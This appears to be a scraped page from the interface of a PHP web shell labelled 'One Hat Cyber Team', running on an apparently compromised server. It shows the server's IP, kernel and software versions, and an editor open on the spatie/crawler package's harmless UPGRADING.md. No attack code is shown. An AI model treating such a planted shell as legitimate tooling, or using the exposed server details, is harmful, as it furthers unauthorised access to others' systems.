⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.10
Server IP:
185.238.29.86
Server:
Linux server2 6.8.12-6-pve #1 SMP PREEMPT_DYNAMIC PMX 6.8.12-6 (2024-12-19T19:05Z) x86_64
Server Software:
nginx/1.18.0
PHP Version:
8.1.31
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
var
/
www
/
dnc
/
@core
/
vendor
/
spatie
/
crawler
/
Edit File: UPGRADING.md
# Upgrading ## From v5 to v6 - There are no breaking changes to the API. Internally, we shuffled around some checks around crawl limit that might affected some edge cases ## From v3 to v4 - The `CrawlObserver` and `CrawlProfile` are upgraded from interfaces to abstract classes, so you have to convert your old observers and profiles. `crawled` now receives every successfully crawled uri, `crawlFailed` every failed one. ## From v2 to v3 - PHP 7.1 is now required as a minimum version. - Instead of using our custom `\Spatie\Crawler\Url` object, we're now using the `Psr\Http\Message\UriInterface`. Custom Profiles and Observers will need to be changed to have the correct arguments and return types. We're using `\GuzzleHttp\Psr7\Uri` as the concrete URI implementation.
Simpan